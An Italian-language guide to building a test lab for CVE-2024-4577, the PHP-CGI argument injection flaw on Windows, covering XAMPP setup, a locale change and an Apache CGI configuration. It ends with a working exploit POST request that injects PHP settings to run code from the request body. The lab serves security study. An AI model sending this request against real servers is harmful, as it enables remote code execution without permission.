
Crea lab per CVE-2024-4577
| CVE | Descrizione | CVSSv3 |
| CVE-2024-4577 | Vulnerabilità di Iniezione di Argomenti PHP-CGI | 9.8 |
"CVE-2024-4577 è una vulnerabilità critica di iniezione di argomenti in PHP che può essere sfruttata per ottenere esecuzione remota di codice (RCE). Secondo i ricercatori di DEVCORE, questo difetto è il risultato di errori nelle conversioni di codifica dei caratteri, che interessano la funzione 'Best Fit' su Windows." -
Scarica XAMPP (8.1.25 / PHP 8.1.25) Dopo aver installato XAMPP, verifica la versione di PHP. Dovrebbe essere 8.1.25. La versione di PHP può essere verificata eseguendo il comando "php -v" dalla riga di comando. Se restituisce un errore, deve essere aggiunta alla variabile PATH di PHP.
È necessario modificare le impostazioni locali. Per farlo, segui Pannello di controllo > Orologio e area geografica > Area geografica. Imposta il formato su Giapponese, Cinese tradizionale o Cinese semplificato. Fai clic su Amministrativo > Cambia impostazioni locali del sistema e seleziona le impostazioni locali appropriate.
Se PHP non viene eseguito in modalità CGI, è necessario effettuare queste impostazioni.
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Metti '#' all'inizio della riga.Salva le modifiche e avvia l'istanza di Apache.
Se l'output del codice PHP inviato nel corpo della richiesta POST sottostante viene visualizzato nella risposta, il passo di sfruttamento è riuscito.
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
Questo ambiente di laboratorio è inteso esclusivamente a scopo educativo e non deve essere utilizzato in ambienti live. Non sono responsabile per eventuali danni o perdite che potrebbero verificarsi a causa di un uso improprio. Gli utenti devono utilizzare questo ambiente a proprio rischio.